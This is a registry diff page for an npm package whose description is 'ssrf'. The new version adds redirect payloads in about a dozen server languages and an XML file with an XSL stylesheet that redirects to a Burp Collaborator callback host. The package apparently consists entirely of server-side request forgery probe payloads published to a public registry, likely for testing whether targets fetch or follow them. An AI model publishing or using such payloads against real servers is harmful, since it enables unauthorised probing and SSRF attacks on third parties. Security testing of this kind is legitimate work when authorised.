m0m0x01d 8.0.0 → 10.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "8.0.0",
3
+ "version": "10.0.0",
4
4
  "description": "ssrf",
5
5
  "main": "index.html",
6
6
  "scripts": {
@@ -0,0 +1 @@
1
+ <% Response.Redirect("https://example.com") %>
@@ -0,0 +1 @@
1
+ <% Response.Redirect("https://example.com") %>
@@ -0,0 +1 @@
1
+ <cflocation url="https://example.com">
@@ -0,0 +1 @@
1
+ return Redirect("https://example.com");
@@ -0,0 +1 @@
1
+ return Redirect("https://example.com");
@@ -0,0 +1 @@
1
+ res.redirect('https://example.com');
@@ -0,0 +1,3 @@
1
+ <%
2
+ response.sendRedirect("https://example.com");
3
+ %>
@@ -0,0 +1 @@
1
+ print "Location: https://example.com\n\n";
@@ -0,0 +1,2 @@
1
+ from flask import redirect
2
+ return redirect("https://example.com")
@@ -0,0 +1 @@
1
+ redirect_to "https://example.com"
@@ -0,0 +1,3 @@
1
+ <?xml version="1.0" encoding="UTF-8"?>
2
+ <?xml-stylesheet type="text/xsl" href="redirect.svg.xsl"?>
3
+ <root/>
@@ -0,0 +1,14 @@
1
+ <?xml version="1.0" encoding="UTF-8"?>
2
+ <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
3
+ <xsl:template match="/">
4
+ <xsl:variable name="url" select="'https://086sqqjyqn0pskt86ozgjwgqwh2aqz.burpcollaborator.net'"/>
5
+ <html>
6
+ <head>
7
+ <meta http-equiv="refresh" content="0; url={$url}" />
8
+ </head>
9
+ <body>
10
+ Redirecting to <xsl:value-of select="$url" />
11
+ </body>
12
+ </html>
13
+ </xsl:template>
14
+ </xsl:stylesheet>